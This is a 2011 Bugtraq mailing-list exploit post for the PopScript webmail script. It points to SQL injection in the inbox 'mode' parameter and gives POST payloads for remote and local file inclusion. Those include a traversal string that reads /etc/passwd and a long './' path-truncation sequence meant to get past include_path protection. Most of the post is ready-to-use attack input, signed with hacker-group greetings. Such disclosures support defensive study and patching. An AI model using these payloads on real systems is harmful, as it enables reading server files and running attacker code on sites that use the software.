[<prev] [next>] [day] [month] [year] [list]
Date: Sun, 5 Jun 2011 07:22:38 -0600
From: root@...y.com
To: bugtraq@...urityfocus.com
Subject: PopScript Multiple Vulnerabilities
##########################################################
# Exploit Title: PopScript Multiple Vulnerabilities
# home : http://www.D99Y.com
# Google Dork: Do as you would be done by ; )
# Date: 5/6/2011
# Author: NassRawI
# Software Link: http://www.popscript.com/
##########################################################
#
# [1] SQL injection
#
# http://localhost/PopScript/index.php?act=inbox&mode=1 [ SQL injection ]
#
# [2] File inclusion = require()
#
# Remote File inclusion :
#
# exploit :
#
# send in index.php [ post ]
#
# email=root@...y.com&mode=[Shell txt]?&password=nassrawi&remember=ON
#
# Local :
#
# exploit :
#
# send in index.php [ post ]
#
# email=root@...y.com&mode=nassrawi../../../../../../etc/passwd&password=nassrawi
#
# You can skip protection include_path ; )
#
# email=root@...y.com&mode=nassrawi../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
/./././././././././././././././././././././././././././././.!
/./././.
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././
././././././././././././././././././././././././././././././!
././././
./././././.&password=nassrawi
#
#
##########################################################
Greetz :
D99Y Team and all members D99Y.CoM
Enjoy ; )
Powered by blists - more mailing lists